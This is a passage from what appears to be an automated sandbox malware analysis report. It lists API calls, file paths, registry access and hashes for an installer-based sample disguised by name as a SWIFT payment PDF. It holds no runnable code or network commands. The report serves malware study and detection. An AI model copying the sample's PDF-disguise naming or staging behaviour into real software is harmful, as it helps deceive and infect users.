                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                • API String ID: 1716503409-678247507
                                                                                                                                • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1096 4063bf-4063df GetSystemDirectoryW 1097 4063e1 1096->1097 1098 4063e3-4063e5 1096->1098 1097->1098 1099 4063f6-4063f8 1098->1099 1100 4063e7-4063f0 1098->1100 1102 4063f9-406428 wsprintfW LoadLibraryW 1099->1102 1100->1099 1101 4063f2-4063f4 1100->1101 1101->1102
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                • wsprintfW.USER32 ref: 00406411
                                                                                                                                • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                • String ID: %s%S.dll
                                                                                                                                • API String ID: 2200240437-2744773210
                                                                                                                                • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                                • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"), ref: 00405AC2
                                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00401612
                                                                                                                                  • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,00000000,?), ref: 00401645
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00401638
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                                                • API String ID: 1892508949-2168965836
                                                                                                                                • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                                                • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                                                APIs
                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                  • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FEE
                                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00401FFF
                                                                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 0040207C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 334405425-0
                                                                                                                                • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                                • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                                                • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                                • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                                                APIs
                                                                                                                                • GlobalFree.KERNEL32(00718400), ref: 00401BA7
                                                                                                                                • GlobalAlloc.KERNELBASE(?,00000804), ref: 00401BB9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                • String ID: Call
                                                                                                                                • API String ID: 3394109436-1824292864
                                                                                                                                • Opcode ID: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                                                                                                                • Instruction ID: 27804974e3ca03393c04398de70bc6092cde1ed56c9d8f76027c1228d60f226a
                                                                                                                                • Opcode Fuzzy Hash: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                                                                                                                • Instruction Fuzzy Hash: 32219072600101EBCB10EFA4CE85E5F77BAAF45324725413BF116B32D1DA78A8519B1D
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000046C,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq69D9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Enum$CloseOpenValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 167947723-0
                                                                                                                                • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                                • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                                                • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                                • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000046C,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq69D9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                                • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                                                • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                                • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                                                APIs
                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                                • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                                                • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                                • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                  • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                  • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                                                  • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                                • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                                                • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                                • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                                • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                                                • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                                • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 415043291-0
                                                                                                                                • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                                • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                                                • GetLastError.KERNEL32 ref: 00405714
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
